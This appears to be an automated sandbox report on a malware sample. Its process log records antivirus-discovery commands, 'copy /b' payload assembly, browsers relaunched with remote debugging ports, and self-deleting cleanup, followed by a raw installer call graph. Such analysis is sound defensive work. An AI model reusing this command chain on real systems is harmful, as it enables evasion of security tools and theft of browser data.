                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                                                                                                                    Start time:03:45:13
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x830000
                                                                                                                                                                                                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                                                                                                    Start time:03:45:13
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                    Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x9e0000
                                                                                                                                                                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                                                                                                    Start time:03:45:14
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x830000
                                                                                                                                                                                                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                                                                                                    Start time:03:45:14
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                    Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x9e0000
                                                                                                                                                                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                                                                                                                    Start time:03:45:14
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                    Commandline:cmd /c md 330775
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                                                                                                                    Start time:03:45:14
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                    Commandline:extrac32 /Y /E Modules
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                                    File size:29'184 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                                                                                                                    Start time:03:45:15
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                    Commandline:findstr /V "however" Hotel
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x9e0000
                                                                                                                                                                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                                                                                                                    Start time:03:45:15
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                    Commandline:cmd /c copy /b 330775\Evans.com + Presentation + Univ + Gmc + Underground + Rd + Burns + Riders + Dp + Finish + Entities + Cleveland 330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                                                                                                                    Start time:03:45:16
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                    Commandline:cmd /c copy /b ..\Delivering + ..\Wisdom + ..\Spare + ..\Earrings + ..\Grey + ..\Bus + ..\Project l
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                                                                                                                    Start time:03:45:16
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                    Commandline:Evans.com l
                                                                                                                                                                                                                                                                                                                                    Imagebase:0xac0000
                                                                                                                                                                                                                                                                                                                                    File size:947'288 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                                                                                                                    Start time:03:45:16
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                    Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x440000
                                                                                                                                                                                                                                                                                                                                    File size:28'160 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                                                                                                                    Start time:03:46:11
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                                                                                                                    Start time:03:46:12
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2068,i,3099484482751593606,10427139142014003377,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                                                                                                                    Start time:03:46:24
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                                                                                                                    Start time:03:46:25
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2692 --field-trial-handle=2548,i,2148176420882130604,12860696726209298526,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                                                                                                                    Start time:03:46:25
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                                                                                                                                    Start time:03:46:25
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                                                                                                                                                    Start time:03:46:30
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6860 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                                                                                                                                    Start time:03:46:30
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7024 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                                                                                                                                                    Start time:03:46:51
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com" & rd /s /q "C:\ProgramData\kno8y" & exit
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                                                                                                                    Start time:03:46:51
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                                                                                                                                    Start time:03:46:51
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                    Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x820000
                                                                                                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                                                                      Execution Coverage:18.7%
                                                                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                      Signature Coverage:20.7%
                                                                                                                                                                                                                                                                                                                                      Total number of Nodes:1525
                                                                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:32
                                                                                                                                                                                                                                                                                                                                      execution_graph 4341 402fc0 4342 401446 18 API calls 4341->4342 4343 402fc7 4342->4343 4344 403017 4343->4344 4345 40300a 4343->4345 4348 401a13 4343->4348 4346 406805 18 API calls 4344->4346 4347 401446 18 API calls 4345->4347 4346->4348 4347->4348 4349 4023c1 4350 40145c 18 API calls 4349->4350 4351 4023c8 4350->4351 4354 40726a 4351->4354 4357 406ed2 CreateFileW 4354->4357 4358 406f04 4357->4358 4359 406f1e ReadFile 4357->4359 4360 4062a3 11 API calls 4358->4360 4361 4023d6 4359->4361 4364 406f84 4359->4364 4360->4361 4362 4071e3 CloseHandle 4362->4361 4363 406f9b ReadFile lstrcpynA lstrcmpA 4363->4364 4365 406fe2 SetFilePointer ReadFile 4363->4365 4364->4361 4364->4362 4364->4363 4368 406fdd 4364->4368 4365->4362 4366 4070a8 ReadFile 4365->4366 4367 407138 4366->4367 4367->4366 4367->4368 4369 40715f SetFilePointer GlobalAlloc ReadFile 4367->4369 4368->4362 4370 4071a3 4369->4370 4371 4071bf lstrcpynW GlobalFree 4369->4371 4370->4370 4370->4371 4371->4362 4372 401cc3 4373 40145c 18 API calls 4372->4373 4374 401cca lstrlenW 4373->4374 4375 4030dc 4374->4375 4376 4030e3 4375->4376 4378 405f51 wsprintfW 4375->4378 4378->4376 4393 401c46 4394 40145c 18 API calls 4393->4394 4395 401c4c 4394->4395 4396 4062a3 11 API calls 4395->4396 4397 401c59 4396->4397 4398 406c9b 81 API calls 4397->4398 4399 401c64 4398->4399 4400 403049 4401 401446 18 API calls 4400->4401 4404 403050 4401->4404 4402 406805 18 API calls 4403 401a13 4402->4403 4404->4402 4404->4403 4405 40204a 4406 401446 18 API calls 4405->4406 4407 402051 IsWindow 4406->4407 4408 4018d3 4407->4408 4409 40324c 4410 403277 4409->4410 4411 40325e SetTimer 4409->4411 4412 4032cc 4410->4412 4413 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4410->4413 4411->4410 4413->4412 4414 4048cc 4415 4048f1 4414->4415 4416 4048da 4414->4416 4418 4048ff IsWindowVisible 4415->4418 4422 404916 4415->4422 4417 4048e0 4416->4417 4432 40495a 4416->4432 4419 403daf SendMessageW 4417->4419 4421 40490c 4418->4421 4418->4432 4423 4048ea 4419->4423 4420 404960 CallWindowProcW 4420->4423 4433 40484e SendMessageW 4421->4433 4422->4420 4438 406009 lstrcpynW 4422->4438 4426 404945 4439 405f51 wsprintfW 4426->4439 4428 40494c 4429 40141d 80 API calls 4428->4429 4430 404953 4429->4430 4440 406009 lstrcpynW 4430->4440 4432->4420 4434 404871 GetMessagePos ScreenToClient SendMessageW 4433->4434 4435 4048ab SendMessageW 4433->4435 4436 4048a3 4434->4436 4437 4048a8 4434->4437 4435->4436 4436->4422 4437->4435 4438->4426 4439->4428 4440->4432 4441 4022cc 4442 40145c 18 API calls 4441->4442 4443 4022d3 4442->4443 4444 4062d5 2 API calls 4443->4444 4445 4022d9 4444->4445 4446 4022e8 4445->4446 4450 405f51 wsprintfW 4445->4450 4449 4030e3 4446->4449 4451 405f51 wsprintfW 4446->4451 4450->4446 4451->4449 4221 4050cd 4222 405295 4221->4222 4223 4050ee GetDlgItem GetDlgItem GetDlgItem 4221->4223 4224 4052c6 4222->4224 4225 40529e GetDlgItem CreateThread CloseHandle 4222->4225 4270 403d98 SendMessageW 4223->4270 4227 4052f4 4224->4227 4229 4052e0 ShowWindow ShowWindow 4224->4229 4230 405316 4224->4230 4225->4224 4273 405047 83 API calls 4225->4273 4231 405352 4227->4231 4233 405305 4227->4233 4234 40532b ShowWindow 4227->4234 4228 405162 4241 406805 18 API calls 4228->4241 4272 403d98 SendMessageW 4229->4272 4235 403dca 8 API calls 4230->4235 4231->4230 4236 40535d SendMessageW 4231->4236 4237 403d18 SendMessageW 4233->4237 4239 40534b 4234->4239 4240 40533d 4234->4240 4238 40528e 4235->4238 4236->4238 4243 405376 CreatePopupMenu 4236->4243 4237->4230 4242 403d18 SendMessageW 4239->4242 4244 404f72 25 API calls 4240->4244 4245 405181 4241->4245 4242->4231 4246 406805 18 API calls 4243->4246 4244->4239 4247 4062a3 11 API calls 4245->4247 4249 405386 AppendMenuW 4246->4249 4248 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4247->4248 4250 4051f3 4248->4250 4251 4051d7 SendMessageW SendMessageW 4248->4251 4252 405399 GetWindowRect 4249->4252 4253 4053ac 4249->4253 4254 405206 4250->4254 4255 4051f8 SendMessageW 4250->4255 4251->4250 4256 4053b3 TrackPopupMenu 4252->4256 4253->4256 4257 403d3f 19 API calls 4254->4257 4255->4254 4256->4238 4258 4053d1 4256->4258 4259 405216 4257->4259 4260 4053ed SendMessageW 4258->4260 4261 405253 GetDlgItem SendMessageW 4259->4261 4262 40521f ShowWindow 4259->4262 4260->4260 4263 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4260->4263 4261->4238 4266 405276 SendMessageW SendMessageW 4261->4266 4264 405242 4262->4264 4265 405235 ShowWindow 4262->4265 4267 40542f SendMessageW 4263->4267 4271 403d98 SendMessageW 4264->4271 4265->4264 4266->4238 4267->4267 4268 40545a GlobalUnlock SetClipboardData CloseClipboard 4267->4268 4268->4238 4270->4228 4271->4261 4272->4227 4452 4030cf 4453 40145c 18 API calls 4452->4453 4454 4030d6 4453->4454 4456 4030dc 4454->4456 4459 4063ac GlobalAlloc lstrlenW 4454->4459 4457 4030e3 4456->4457 4486 405f51 wsprintfW 4456->4486 4460 4063e2 4459->4460 4461 406434 4459->4461 4462 40640f GetVersionExW 4460->4462 4487 40602b CharUpperW 4460->4487 4461->4456 4462->4461 4463 40643e 4462->4463 4464 406464 LoadLibraryA 4463->4464 4465 40644d 4463->4465 4464->4461 4468 406482 GetProcAddress GetProcAddress GetProcAddress 4464->4468 4465->4461 4467 406585 GlobalFree 4465->4467 4469 40659b LoadLibraryA 4467->4469 4470 4066dd FreeLibrary 4467->4470 4473 4064aa 4468->4473 4476 4065f5 